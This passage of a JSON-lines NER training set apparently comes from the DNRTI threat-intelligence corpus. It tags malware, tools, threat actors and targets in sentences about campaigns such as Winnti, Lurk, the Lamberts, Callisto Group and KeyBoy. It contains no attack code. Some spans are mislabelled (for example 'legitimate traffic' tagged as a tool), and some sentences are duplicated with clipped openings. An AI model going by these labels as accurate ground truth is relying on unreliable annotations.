"spans": {"TOOL: Infy": [[0, 4]], "ORGANIZATION: development agencies": [[176, 196]]}, "info": {"id": "dnrti_train_002070", "source": "dnrti_train"}} {"text": "The malicious samples we found are the early stage malware most often delivered by spear-phishing e-mails .", "spans": {}, "info": {"id": "dnrti_train_002071", "source": "dnrti_train"}} {"text": "This next stage library copies itself into the System32 directory of the Windows folder after the hardcoded file name — either KBDLV2.DLL or AUTO.DLL , depending on the malware sample .", "spans": {"MALWARE: KBDLV2.DLL": [[127, 137]], "MALWARE: AUTO.DLL": [[141, 149]]}, "info": {"id": "dnrti_train_002072", "source": "dnrti_train"}} {"text": "At this stage , the malware gathers information about the infected computer .", "spans": {}, "info": {"id": "dnrti_train_002073", "source": "dnrti_train"}} {"text": "Hancom Office is widely used in South Korea .", "spans": {}, "info": {"id": "dnrti_train_002074", "source": "dnrti_train"}} {"text": "Perhaps it also points to the suspected North Korean origin of attack .", "spans": {}, "info": {"id": "dnrti_train_002075", "source": "dnrti_train"}} {"text": "The attacker is from North Korea .", "spans": {}, "info": {"id": "dnrti_train_002076", "source": "dnrti_train"}} {"text": "All of them lie in ranges of the Jilin Province Network and Liaoning Province Network , in China .", "spans": {}, "info": {"id": "dnrti_train_002077", "source": "dnrti_train"}} {"text": "Finally , this geo-location supports the likely theory that the attackers behind Kimsuky are based in North Korea .", "spans": {"THREAT_ACTOR: Kimsuky": [[81, 88]]}, "info": {"id": "dnrti_train_002078", "source": "dnrti_train"}} {"text": "According to the German press , the intruders used the Winnti family of malware as their main implant , giving them persistent access to the conglomerate 's network as early as February 2016 .", "spans": {"TOOL: Winnti family of malware": [[55, 79]]}, "info": {"id": "dnrti_train_002080", 
"source": "dnrti_train"}} {"text": "To show how this breach and similar breaches can be mitigated , we look at how Windows Defender ATP flags activities associated with BARIUM , LEAD , and other known activity groups and how it provides extensive threat intelligence about these groups .", "spans": {"ORGANIZATION: Windows Defender ATP": [[79, 99]]}, "info": {"id": "dnrti_train_002083", "source": "dnrti_train"}} {"text": "During these intrusions , LEAD 's objective was to steal sensitive data , including research materials , process documents , and project plans .", "spans": {}, "info": {"id": "dnrti_train_002085", "source": "dnrti_train"}} {"text": "Microsoft Analytics shows that Winnti has been used in intrusions carried out throughout Asia , Europe , Oceania , the Middle East , and the United States in the last six months ( Figure 1 ) .", "spans": {"ORGANIZATION: Microsoft Analytics": [[0, 19]], "TOOL: Winnti": [[31, 37]]}, "info": {"id": "dnrti_train_002089", "source": "dnrti_train"}} {"text": "Instead , Lead often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware .", "spans": {"TOOL: Winnti installer": [[37, 53]]}, "info": {"id": "dnrti_train_002090", "source": "dnrti_train"}} {"text": "This was the case in two known intrusions in 2015 , where attackers named the implant DLL \" ASPNET_FILTER.DLL \" to disguise it as the DLL for the ASP.NET ISAPI Filter .", "spans": {"MALWARE: ASPNET_FILTER.DLL": [[92, 109]], "MALWARE: ASP.NET ISAPI Filter": [[146, 166]]}, "info": {"id": "dnrti_train_002092", "source": "dnrti_train"}} {"text": "And , finally , with the upcoming Creators Update , Windows Defender ATP will provide additional capabilities for detecting threats such as Winnti , as well as centralized response options , such as machine isolation and file blocking , that will enable fast containment of known attack jump off points .", "spans": {"TOOL: Creators Update": 
[[34, 49]], "ORGANIZATION: Windows Defender ATP": [[52, 72]]}, "info": {"id": "dnrti_train_002097", "source": "dnrti_train"}} {"text": "The police suspected Lurk of stealing nearly three billion rubles , using malicious software to systematically withdraw large sums of money from the accounts of commercial organizations , including banks .", "spans": {"TOOL: Lurk": [[21, 25]], "ORGANIZATION: commercial organizations": [[161, 185]]}, "info": {"id": "dnrti_train_002098", "source": "dnrti_train"}} {"text": "When we first encountered Lurk , in 2011 , it was a nameless Trojan .", "spans": {"TOOL: Lurk": [[26, 30]]}, "info": {"id": "dnrti_train_002099", "source": "dnrti_train"}} {"text": "This article is an attempt to share this experience with other experts , particularly the IT security specialists in companies and financial institutions that increasingly find themselves the targets of cyber-attacks .", "spans": {"ORGANIZATION: financial institutions": [[131, 153]]}, "info": {"id": "dnrti_train_002101", "source": "dnrti_train"}} {"text": "In most cases , the attackers only had to infect the computer on which the RBS software was installed in order to start stealing the cash .", "spans": {}, "info": {"id": "dnrti_train_002102", "source": "dnrti_train"}} {"text": "We were soon able to help investigate another incident involving Lurk .", "spans": {"TOOL: Lurk": [[65, 69]]}, "info": {"id": "dnrti_train_002103", "source": "dnrti_train"}} {"text": "This event significantly affected the Russian cybercriminal world as the gang had stolen hundreds of millions of rubles during a few years of activity , and was considered a \" leader \" among cybercriminals .", "spans": {}, "info": {"id": "dnrti_train_002104", "source": "dnrti_train"}} {"text": "In Russia , there were several relatively large cybercriminal groups engaged in financial theft via attacks on RBS .", "spans": {}, "info": {"id": "dnrti_train_002105", "source": "dnrti_train"}} {"text": "In April 2013 , a year after we 
found the \" bodiless \" Lurk module , the Russian cybercriminal underground exploited several families of malicious software that specialized in attacks on banking software .", "spans": {"TOOL: Lurk module": [[55, 66]]}, "info": {"id": "dnrti_train_002106", "source": "dnrti_train"}} {"text": "Through the information exchanges used by people in the security industry , we learned that several Russian banks were struggling with malicious programs created specifically to attack a particular type of legal banking software .", "spans": {}, "info": {"id": "dnrti_train_002107", "source": "dnrti_train"}} {"text": "If it did , the malware downloaded additional modules , including ones allowing for the automatic creation of unauthorized payment orders , changing details in legal payment orders , etc .", "spans": {}, "info": {"id": "dnrti_train_002108", "source": "dnrti_train"}} {"text": "As far as we can judge from the data we have , in 2014 the criminal group behind Lurk seriously reduced its activity and \" lived from hand to mouth \" , attacking anyone they could , including ordinary users .", "spans": {"TOOL: Lurk": [[81, 85]]}, "info": {"id": "dnrti_train_002109", "source": "dnrti_train"}} {"text": "In February 2015 , Kaspersky Lab 's Global Research and Analysis Team ( GReAT ) released its research into the Carbanak campaign targeting financial institutions .", "spans": {"ORGANIZATION: Kaspersky Lab": [[19, 32]], "ORGANIZATION: GReAT": [[72, 77]], "ORGANIZATION: financial institutions": [[139, 161]]}, "info": {"id": "dnrti_train_002110", "source": "dnrti_train"}} {"text": "Since 2011 , the robbers had allegedly been stealing money directly from bank accounts in Russia and other countries of the Commonwealth of Independent States ( CIS ) by using a Trojan called Lurk .", "spans": {"TOOL: Trojan": [[178, 184]], "TOOL: Lurk": [[192, 196]]}, "info": {"id": "dnrti_train_002111", "source": "dnrti_train"}} {"text": "which they launched targeted attacks against Russian banks , 
businesses and media companies .", "spans": {"ORGANIZATION: media companies": [[76, 91]]}, "info": {"id": "dnrti_train_002112", "source": "dnrti_train"}} {"text": "Lurk uses a form of steganography : that's where one file is hidden away inside another file of a completely different sort , such as an image , audio , or video file .", "spans": {"TOOL: Lurk": [[0, 4]]}, "info": {"id": "dnrti_train_002113", "source": "dnrti_train"}} {"text": "The latest version of Madi also has the ability to monitor the Russian social network Vkontakte ( VK ) along with the Jabber messaging platform to look for users who visit websites that contain words like \" USA \" , \" Skype \" , and \" gov \" .", "spans": {}, "info": {"id": "dnrti_train_002114", "source": "dnrti_train"}} {"text": "Madi was found capturing computer screens , recording audio and stealing screenshots , keystrokes , documents and e-mail correspondence from \" Middle Eastern critical infrastructure engineering firms , government agencies , financial houses and academia .", "spans": {"ORGANIZATION: critical infrastructure engineering firms": [[158, 199]], "ORGANIZATION: government agencies": [[202, 221]]}, "info": {"id": "dnrti_train_002115", "source": "dnrti_train"}} {"text": "A timeline of new activity can be scoped out for the group , with the greatest number of related downloaders created by the developers in December 2011 , Feb and March of 2012 , followed by June of 2012 .", "spans": {}, "info": {"id": "dnrti_train_002116", "source": "dnrti_train"}} {"text": "it reports to was created on August 10 , 2011 .", "spans": {}, "info": {"id": "dnrti_train_002117", "source": "dnrti_train"}} {"text": "Since at least 2008 , The Lamberts have used multiple sophisticated attack tools against high-profile victims .", "spans": {"TOOL: Lamberts": [[26, 34]]}, "info": {"id": "dnrti_train_002118", "source": "dnrti_train"}} {"text": "Longhorn , which we internally refer to as \" The Lamberts \" , first came to the attention of 
the ITSec community in 2014 , when our colleagues from FireEye discovered an attack using a zero day vulnerability ( CVE-2014-4148 ) .", "spans": {"THREAT_ACTOR: The Lamberts": [[45, 57]], "ORGANIZATION: ITSec community": [[97, 112]], "ORGANIZATION: FireEye": [[148, 155]], "VULNERABILITY: zero day vulnerability": [[185, 207]], "VULNERABILITY: CVE-2014-4148": [[210, 223]]}, "info": {"id": "dnrti_train_002119", "source": "dnrti_train"}} {"text": "The attack leveraged malware we called ' BlackLambert ' , which was used to target a high profile organization in Europe .", "spans": {"TOOL: BlackLambert": [[41, 53]], "ORGANIZATION: high profile organization": [[85, 110]]}, "info": {"id": "dnrti_train_002120", "source": "dnrti_train"}} {"text": "Their arsenal includes network-driven backdoors , several generations of modular backdoors , harvesting tools , and wipers .", "spans": {"TOOL: network-driven backdoors": [[23, 47]], "TOOL: modular backdoors": [[73, 90]], "TOOL: harvesting tools": [[93, 109]], "TOOL: wipers": [[116, 122]]}, "info": {"id": "dnrti_train_002121", "source": "dnrti_train"}} {"text": "The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild .", "spans": {"TOOL: Lambert family malware": [[19, 41]], "ORGANIZATION: FireEye": [[92, 99]], "VULNERABILITY: zero day exploit": [[122, 138]], "VULNERABILITY: CVE-2014-4148": [[141, 154]]}, "info": {"id": "dnrti_train_002122", "source": "dnrti_train"}} {"text": "Interestingly , while most Blue Lambert variants have version numbers in the range of 2.x , Green Lambert is mostly in 3.x versions .", "spans": {"TOOL: Blue Lambert": [[27, 39]], "TOOL: Green Lambert": [[92, 105]]}, "info": {"id": "dnrti_train_002123", "source": "dnrti_train"}} {"text": "While investigating one of these infections involving White Lambert ( network-driven implant ) and Blue Lambert ( active implant ) , we found yet another 
family of tools that appear to be related .", "spans": {"TOOL: White Lambert": [[54, 67]], "TOOL: Blue Lambert": [[99, 111]]}, "info": {"id": "dnrti_train_002124", "source": "dnrti_train"}} {"text": "Versions of this particular orchestrator were found on other victims , together with White Lambert samples , indicating a close relationship between the White and Pink Lambert malware families .", "spans": {"TOOL: White Lambert samples": [[85, 106]], "TOOL: White": [[153, 158]], "TOOL: Pink Lambert malware families": [[163, 192]]}, "info": {"id": "dnrti_train_002125", "source": "dnrti_train"}} {"text": "While in most cases the infection vector remains unknown , the high profile attack from 2014 used a very complex Windows TTF zero-day exploit ( CVE-2014-4148 ) .", "spans": {"VULNERABILITY: zero-day exploit": [[125, 141]], "VULNERABILITY: CVE-2014-4148": [[144, 157]]}, "info": {"id": "dnrti_train_002126", "source": "dnrti_train"}} {"text": "This migration activity was last observed in October 2016 .", "spans": {}, "info": {"id": "dnrti_train_002127", "source": "dnrti_train"}} {"text": "Most of the Blue and Green Lambert samples have two C&C servers hardcoded in their configuration block : a hostname and an IP address .", "spans": {"TOOL: Blue and Green Lambert samples": [[12, 42]]}, "info": {"id": "dnrti_train_002128", "source": "dnrti_train"}} {"text": "Some of the known filenames for Gray Lambert are mwapi32.dll and poolstr.dll – it should be pointed though that the filenames used by the Lamberts are generally unique and have never been used twice .", "spans": {"TOOL: Gray Lambert": [[32, 44]], "TOOL: mwapi32.dll": [[49, 60]], "TOOL: poolstr.dll": [[65, 76]], "TOOL: Lamberts": [[138, 146]]}, "info": {"id": "dnrti_train_002129", "source": "dnrti_train"}} {"text": "Black Lambert was seen only briefly and we assume it was \" retired \" from the arsenal after being discovered by FireEye in 2014 .", "spans": {"TOOL: Black Lambert": [[0, 13]], "ORGANIZATION: FireEye": 
[[112, 119]]}, "info": {"id": "dnrti_train_002130", "source": "dnrti_train"}} {"text": "The Lamberts toolkit spans across several years , with most activity occurring in 2013 and 2014 .", "spans": {"TOOL: Lamberts toolkit": [[4, 20]]}, "info": {"id": "dnrti_train_002131", "source": "dnrti_train"}} {"text": "To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 .", "spans": {"TOOL: Lamberts toolkit": [[69, 85]], "TOOL: Black Lambert": [[102, 115]], "VULNERABILITY: zero day exploit": [[152, 168]], "VULNERABILITY: CVE-2014-4148": [[171, 184]]}, "info": {"id": "dnrti_train_002132", "source": "dnrti_train"}} {"text": "Taking that into account , we classify the Lamberts as the same level of complexity as Regin , ProjectSauron , Equation and Duqu2 , which makes them one of the most sophisticated cyber espionage toolkits we have ever analysed .", "spans": {"TOOL: Lamberts": [[43, 51]], "TOOL: Regin": [[87, 92]], "TOOL: ProjectSauron": [[95, 108]], "TOOL: Equation": [[111, 119]], "TOOL: Duqu2": [[124, 129]]}, "info": {"id": "dnrti_train_002133", "source": "dnrti_train"}} {"text": "On January 15 , Confiant exposed the activity of the Zirconium group , spreading malicious ads via a network of fake ad agencies through 2017 , in what amounted to the largest malvertising campaign of recent times .", "spans": {"ORGANIZATION: fake ad agencies": [[112, 128]]}, "info": {"id": "dnrti_train_002135", "source": "dnrti_train"}} {"text": "Cadelle , uses Backdoor.Cadelspy .", "spans": {"TOOL: Backdoor.Cadelspy": [[15, 32]]}, "info": {"id": "dnrti_train_002136", "source": "dnrti_train"}} {"text": "Symantec telemetry identified Cadelle and Chafer activity dating from as far back as July 2014 , however , it's likely that activity began well before this date .", "spans": {"ORGANIZATION: Symantec": [[0, 8]]}, "info": {"id": "dnrti_train_002137", "source": 
"dnrti_train"}} {"text": "Chafer , uses Backdoor.Remexi .", "spans": {"TOOL: Backdoor.Remexi": [[14, 29]]}, "info": {"id": "dnrti_train_002138", "source": "dnrti_train"}} {"text": "Cadelle 's threats are capable of opening a back door and stealing information from victims' computers .", "spans": {}, "info": {"id": "dnrti_train_002139", "source": "dnrti_train"}} {"text": "Chafer , uses Backdoor.Remexi.B .", "spans": {"TOOL: Backdoor.Remexi.B": [[14, 31]]}, "info": {"id": "dnrti_train_002140", "source": "dnrti_train"}} {"text": "registrant information points to activity possibly as early as 2011 .", "spans": {}, "info": {"id": "dnrti_train_002141", "source": "dnrti_train"}} {"text": "These threats are capable of opening a back door and stealing information from victims' computers .", "spans": {}, "info": {"id": "dnrti_train_002142", "source": "dnrti_train"}} {"text": "executable compilation times suggest early 2012 .", "spans": {}, "info": {"id": "dnrti_train_002143", "source": "dnrti_train"}} {"text": "It's unclear how Cadelle infects its targets with Backdoor.Cadelspy .", "spans": {"TOOL: Backdoor.Cadelspy": [[50, 67]]}, "info": {"id": "dnrti_train_002144", "source": "dnrti_train"}} {"text": "The affected organizations we were able to identify are mostly based in the Middle East .", "spans": {}, "info": {"id": "dnrti_train_002145", "source": "dnrti_train"}} {"text": "one organization is located in the US .", "spans": {}, "info": {"id": "dnrti_train_002146", "source": "dnrti_train"}} {"text": "There are a number of factors in these groups' campaigns that suggests that the attackers may be based in Iran .", "spans": {}, "info": {"id": "dnrti_train_002147", "source": "dnrti_train"}} {"text": "Their primary interest appears to be gathering intelligence .", "spans": {}, "info": {"id": "dnrti_train_002149", "source": "dnrti_train"}} {"text": "This stands in opposition to the data gathered from export timestamps and C&C domain activity that points to Green Lambert being 
considerably older than the Blue variant .", "spans": {"TOOL: Green Lambert": [[109, 122]], "TOOL: Blue": [[157, 161]]}, "info": {"id": "dnrti_train_002150", "source": "dnrti_train"}} {"text": "security policy in the Eastern Europe and South Caucasus regions .", "spans": {}, "info": {"id": "dnrti_train_002151", "source": "dnrti_train"}} {"text": "Callisto Group via credential phishingThese spear phishing emails were crafted to appear highly convincing , including being sent from legitimate email accounts suspected to have been previously compromised by the Callisto Group via credential phishing .", "spans": {}, "info": {"id": "dnrti_train_002152", "source": "dnrti_train"}} {"text": "In early 2016 the Callisto Group began sending highly targeted spear phishing emails with malicious attachments that contained , as their final payload , the \" Scout \" malware tool from the HackingTeam RCS Galileo platform .", "spans": {"MALWARE: malicious attachments": [[90, 111]], "TOOL: Scout": [[160, 165]]}, "info": {"id": "dnrti_train_002153", "source": "dnrti_train"}} {"text": "These spear phishing emails were crafted to appear highly convincing , including being sent from legitimate email accounts suspected to have been previously compromised by the Callisto Group via credential phishing .", "spans": {}, "info": {"id": "dnrti_train_002154", "source": "dnrti_train"}} {"text": "Callisto Group appears to be intelligence gathering related to European foreign and security policy .", "spans": {}, "info": {"id": "dnrti_train_002155", "source": "dnrti_train"}} {"text": "some indications of loosely linked activity dating back to at least 2013 .", "spans": {}, "info": {"id": "dnrti_train_002156", "source": "dnrti_train"}} {"text": "In October 2015 , the Callisto Group was observed sending targeted credential phishing emails .", "spans": {"THREAT_ACTOR: Callisto Group": [[22, 36]]}, "info": {"id": "dnrti_train_002157", "source": "dnrti_train"}} {"text": "In early 2016 , the Callisto Group 
was observed sending targeted spear phishing emails .", "spans": {}, "info": {"id": "dnrti_train_002158", "source": "dnrti_train"}} {"text": "The malicious attachments purported to be invitations or drafts of the agenda for the conference .", "spans": {"MALWARE: malicious attachments": [[4, 25]], "TOOL: invitations": [[42, 53]], "TOOL: drafts of the agenda": [[57, 77]]}, "info": {"id": "dnrti_train_002159", "source": "dnrti_train"}} {"text": "Based on our analysis of Callisto Group 's usage of RCS Galileo , we believe the Callisto Group did not utilize the leaked RCS Galileo source code , but rather used the leaked readymade installers to set up their own installation of the RCS Galileo platform .", "spans": {"THREAT_ACTOR: Callisto Group": [[25, 39]], "TOOL: installers": [[186, 196]]}, "info": {"id": "dnrti_train_002160", "source": "dnrti_train"}} {"text": "In the known spear phishing attacks by the Callisto Group , they employed the \" Scout \" malware tool from the RCS Galileo platform .", "spans": {"THREAT_ACTOR: Callisto Group": [[43, 57]], "TOOL: Scout": [[80, 85]], "THREAT_ACTOR: Galileo": [[114, 121]]}, "info": {"id": "dnrti_train_002161", "source": "dnrti_train"}} {"text": "We are confident the Callisto Group used this type of access to a target 's email account for the purposes of sending spear phishing to other targets .", "spans": {}, "info": {"id": "dnrti_train_002162", "source": "dnrti_train"}} {"text": "If a target of the spear phishing described in \" Phase 2 : malware deployment \" opened the email attachment and , crucially , clicked on the icon in the attachment , this would lead to the target 's computer becoming infected with the \" Scout \" malware tool from the RCS Galileo platform .", "spans": {"TOOL: Scout": [[237, 242]]}, "info": {"id": "dnrti_train_002163", "source": "dnrti_train"}} {"text": "Callisto Group and related infrastructure contain links to at least Russia , Ukraine , and China .", "spans": {}, "info": {"id": 
"dnrti_train_002164", "source": "dnrti_train"}} {"text": "they have been last known to employ malware in February 2016 .", "spans": {}, "info": {"id": "dnrti_train_002165", "source": "dnrti_train"}} {"text": "RCS Galileo platform .", "spans": {}, "info": {"id": "dnrti_train_002166", "source": "dnrti_train"}} {"text": "The spear phishing emails used in the known attacks by the Callisto Group were so convincing that even skilled and alert users would likely have attempted to open the malicious attachment .", "spans": {"THREAT_ACTOR: Callisto Group": [[59, 73]]}, "info": {"id": "dnrti_train_002167", "source": "dnrti_train"}} {"text": "In October 2015 the Callisto Group targeted a handful of individuals with phishing emails that attempted to obtain the target 's webmail credentials .", "spans": {}, "info": {"id": "dnrti_train_002168", "source": "dnrti_train"}} {"text": "The Callisto Group has been active at least since late 2015 and continues to be so , including continuing to set up new phishing infrastructure every week .", "spans": {}, "info": {"id": "dnrti_train_002169", "source": "dnrti_train"}} {"text": "Called Greenbug , this group is believed to be instrumental in helping Shamoon steal user credentials of targets ahead of Shamoon 's destructive attacks .", "spans": {}, "info": {"id": "dnrti_train_002170", "source": "dnrti_train"}} {"text": "On Tuesday , Arbor Networks said that it has new leads on a credential stealing remote access Trojan ( RAT ) called Ismdoor , possibly used by Greenbug to steal credentials on Shamoon 's behalf .", "spans": {"ORGANIZATION: Arbor Networks": [[13, 27]], "TOOL: Trojan": [[94, 100]], "TOOL: RAT": [[103, 106]], "TOOL: Ismdoor": [[116, 123]]}, "info": {"id": "dnrti_train_002171", "source": "dnrti_train"}} {"text": "\" With our latest research we now see how Greenbug has shifted away from HTTP-based C2 communication with Ismdoor .", "spans": {"TOOL: Ismdoor": [[106, 113]]}, "info": {"id": "dnrti_train_002172", "source": 
"dnrti_train"}} {"text": "It's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost .", "spans": {"TOOL: DNS-based attack technique": [[26, 52]], "ORGANIZATION: Arbor 's ASERT Team": [[183, 202]]}, "info": {"id": "dnrti_train_002173", "source": "dnrti_train"}} {"text": "t's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost .", "spans": {"TOOL: DNS-based attack technique": [[25, 51]], "ORGANIZATION: Arbor 's ASERT Team": [[182, 201]]}, "info": {"id": "dnrti_train_002174", "source": "dnrti_train"}} {"text": "By relying on a native PDF command to navigate to a new URL , Zirconium successfully circumvented Chrome 's anti-redirect protection .", "spans": {}, "info": {"id": "dnrti_train_002175", "source": "dnrti_train"}} {"text": "In the context of the Ismdoor RAT , the DNS attack technique is used primarily by Greenbug for stealing credentials .", "spans": {"TOOL: Ismdoor RAT": [[22, 33]]}, "info": {"id": "dnrti_train_002176", "source": "dnrti_train"}} {"text": "To do this , it employs a number of specific commands via DNSMessenger .", "spans": {"TOOL: DNSMessenger": [[58, 70]]}, "info": {"id": "dnrti_train_002177", "source": "dnrti_train"}} {"text": "Iranian Threat Agent Greenbug has been registering domains similar to those of Israeli High-Tech and Cyber Security Companies .", "spans": {"ORGANIZATION: High-Tech": [[87, 96]], "ORGANIZATION: Cyber Security Companies": [[101, 125]]}, "info": {"id": "dnrti_train_002178", "source": "dnrti_train"}} {"text": "By pivoting off the registration details and servers data of the two domains we discovered others registered by the threat agent .", "spans": {}, "info": {"id": 
"dnrti_train_002179", "source": "dnrti_train"}} {"text": "Named Trochilus , this new RAT was part of Group 27 's malware portfolio that included six other malware strains , all served together or in different combinations , based on the data that needed to be stolen from each victim .", "spans": {"TOOL: Trochilus": [[6, 15]], "TOOL: RAT": [[27, 30]]}, "info": {"id": "dnrti_train_002180", "source": "dnrti_train"}} {"text": "According to the security experts , this collection of malware was discovered after their first initial report was published , meaning that Group 27 ignored the fact they were unmasked and continued to infect their targets regardless , through the same entry point , the Myanmar Union Election Commission ( UEC ) website .", "spans": {"ORGANIZATION: Myanmar Union Election Commission": [[271, 304]], "ORGANIZATION: UEC": [[307, 310]]}, "info": {"id": "dnrti_train_002181", "source": "dnrti_train"}} {"text": "Trochilus RAT activity was discovered during both months of October and November 2015 .", "spans": {}, "info": {"id": "dnrti_train_002182", "source": "dnrti_train"}} {"text": "From September 2016 through late November 2016 , a threat actor group used both the Trochilus RAT and a newly idenfied RAT we've named MoonWind to target organizations in Thailand , including a utility organization .", "spans": {"TOOL: Trochilus RAT": [[84, 97]], "TOOL: RAT": [[119, 122]], "TOOL: MoonWind": [[135, 143]], "ORGANIZATION: utility organization": [[194, 214]]}, "info": {"id": "dnrti_train_002183", "source": "dnrti_train"}} {"text": "We chose the name ' MoonWind ' based on debugging strings we saw within the samples , as well as the compiler used to generate the samples .", "spans": {"TOOL: MoonWind": [[20, 28]]}, "info": {"id": "dnrti_train_002184", "source": "dnrti_train"}} {"text": "The attackers compromised two legitimate Thai websites to host the malware , which is a tactic this group has used in the past .", "spans": {"TOOL: legitimate Thai websites": [[30, 
54]]}, "info": {"id": "dnrti_train_002185", "source": "dnrti_train"}} {"text": "Both the Trochilus and MoonWind RATs were hosted on the same compromised sites and used to target the same organization at the same time .", "spans": {"TOOL: Trochilus": [[9, 18]], "TOOL: MoonWind RATs": [[23, 36]]}, "info": {"id": "dnrti_train_002186", "source": "dnrti_train"}} {"text": "The attackers used different command and control servers ( C2s ) for each malware family , a tactic we believe was meant to thwart attempts to tie the attacks together using infrastructure alone .", "spans": {"TOOL: command and control servers": [[29, 56]]}, "info": {"id": "dnrti_train_002187", "source": "dnrti_train"}} {"text": "Further research led us to additional MoonWind samples using the same C2 ( dns.webswindows.com ) but hosted on a different compromised but legitimate website .", "spans": {"TOOL: MoonWind samples": [[38, 54]], "TOOL: legitimate website": [[139, 157]]}, "info": {"id": "dnrti_train_002188", "source": "dnrti_train"}} {"text": "The attacks in that case took place in late September to early October 2016 and the attackers stored the MoonWind samples as RAR files , while in the November attacks the RATs were stored as executables .", "spans": {"TOOL: MoonWind samples": [[105, 121]], "TOOL: RAR files": [[125, 134]], "TOOL: RATs": [[171, 175]]}, "info": {"id": "dnrti_train_002189", "source": "dnrti_train"}} {"text": "We were not able to find additional tools , but the attackers again compromised a legitimate Thai website to host their malware , in this case the student portal for a Thai University .", "spans": {}, "info": {"id": "dnrti_train_002190", "source": "dnrti_train"}} {"text": "Trochilus was first reported by Arbor Networks in their Seven Pointed Dagger report tying its use to other targeted Southeast Asia activity .", "spans": {"TOOL: Trochilus": [[0, 9]], "ORGANIZATION: Arbor Networks": [[32, 46]]}, "info": {"id": "dnrti_train_002191", "source": "dnrti_train"}} {"text": "The 
activity dates to at least 2013 and has ties to multiple reports by other researchers .", "spans": {}, "info": {"id": "dnrti_train_002192", "source": "dnrti_train"}} {"text": "It is highly likely MoonWind is yet another new tool being used by the group or groups responsible for that activity , indicating they are not only still active but continuing to evolve their playbook .", "spans": {"TOOL: MoonWind": [[20, 28]]}, "info": {"id": "dnrti_train_002193", "source": "dnrti_train"}} {"text": "The samples provided were alleged to be targeting Tibetan and Chinese Pro-Democracy Activists .", "spans": {}, "info": {"id": "dnrti_train_002194", "source": "dnrti_train"}} {"text": "On June 7 , 2013 , Rapid7 released an analysis of malware dubbed ' KeyBoy ' , also exploiting unknown vulnerabilities in Microsoft Office , similarly patched by MS12-060 , but allegedly targeting interests in Vietnam and India .", "spans": {"ORGANIZATION: Rapid7": [[19, 25]], "TOOL: KeyBoy": [[67, 73]], "TOOL: MS12-060": [[161, 169]]}, "info": {"id": "dnrti_train_002195", "source": "dnrti_train"}} {"text": "As we have seen in some previous targeted malware attacks , the attackers in this incident are taking advantage of services like changeip.com to establish free subdomains in their infrastructure .", "spans": {}, "info": {"id": "dnrti_train_002196", "source": "dnrti_train"}} {"text": "Blending in with legitimate traffic is a common tactic used by attackers to help fly under the radar .", "spans": {"TOOL: legitimate traffic": [[17, 35]]}, "info": {"id": "dnrti_train_002197", "source": "dnrti_train"}} {"text": "Subdomains at phmail.us have been linked to malicious activity dating back as far as December 2011 .", "spans": {}, "info": {"id": "dnrti_train_002198", "source": "dnrti_train"}} {"text": "Based on the patterns of subdomain registration over time in DNS , TRAC believes this is an example where the attackers registered their own second-level domain .", "spans": {"ORGANIZATION: TRAC": [[67, 
71]]}, "info": {"id": "dnrti_train_002199", "source": "dnrti_train"}} {"text": "In this blog post we'll analyze two specific incidents apparently targeting victims in Vietnam and in India and we'll describe the capabilities of the custom backdoor being used that for convenience ( and to our knowledge , for a lack of an existing name ) we call KeyBoy , due to a string present in one of the samples .", "spans": {"TOOL: backdoor": [[158, 166]], "TOOL: KeyBoy": [[265, 271]]}, "info": {"id": "dnrti_train_002200", "source": "dnrti_train"}} {"text": "We encountered the first document exploit called \" THAM luan - GD - NCKH2.doc \" a few days ago , which appears to be leveraging some vulnerabilities patched with MS12-060 .", "spans": {"MALWARE: THAM luan - GD -": [[51, 67]], "MALWARE: NCKH2.doc": [[68, 77]], "TOOL: MS12-060": [[162, 170]]}, "info": {"id": "dnrti_train_002201", "source": "dnrti_train"}} {"text": "For the sake of this analysis we'll take the Vietnamese backdoor as an example ; the one found in the Indian attack operates in the exact same way .", "spans": {"TOOL: Vietnamese backdoor": [[45, 64]]}, "info": {"id": "dnrti_train_002203", "source": "dnrti_train"}} {"text": "In the second set they are making use of a dynamic DNS service by ChangeIP.com .", "spans": {"TOOL: dynamic DNS service": [[43, 62]]}, "info": {"id": "dnrti_train_002204", "source": "dnrti_train"}} {"text": "The Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information .", "spans": {"ORGANIZATION: Tibetan community": [[4, 21]], "TOOL: malware": [[91, 98]]}, "info": {"id": "dnrti_train_002205", "source": "dnrti_train"}} {"text": "he Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information .", "spans": {"ORGANIZATION: Tibetan community": [[3, 20]], "TOOL: malware": [[90, 97]]}, "info": {"id": "dnrti_train_002206", 
"source": "dnrti_train"}} {"text": "They are often targeted simultaneously with other ethnic minorities and religious groups in China .", "spans": {"ORGANIZATION: ethnic minorities": [[50, 67]], "ORGANIZATION: religious groups": [[72, 88]]}, "info": {"id": "dnrti_train_002207", "source": "dnrti_train"}} {"text": "Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": {"MALWARE: document malware": [[26, 42]], "ORGANIZATION: Tibetan non-governmental organizations": [[62, 100]], "ORGANIZATION: Falun Gong": [[129, 139]], "ORGANIZATION: Uyghur groups": [[144, 157]]}, "info": {"id": "dnrti_train_002208", "source": "dnrti_train"}} {"text": "More recently in 2016 , Arbor Networks reported on connected malware operations continuing to target these same groups , which the Communist Party of China perceives as a threat to its power .", "spans": {"ORGANIZATION: Arbor Networks": [[24, 38]]}, "info": {"id": "dnrti_train_002209", "source": "dnrti_train"}} {"text": "For example , we have observed frequent reuse of older ( patched ) exploits in malware operations against the Tibetan community .", "spans": {"ORGANIZATION: Tibetan community": [[110, 127]]}, "info": {"id": "dnrti_train_002211", "source": "dnrti_train"}} {"text": "These operations involved highly targeted email lures with repurposed content and attachments that contained an updated version of KeyBoy .", "spans": {"TOOL: email lures": [[42, 53]], "TOOL: KeyBoy": [[131, 137]]}, "info": {"id": "dnrti_train_002212", "source": "dnrti_train"}} {"text": "In August and October 2016 we observed a malware operation targeting members of the Tibetan Parliament ( the highest legislative organ of the Tibetan government in exile , formally known as Central Tibetan 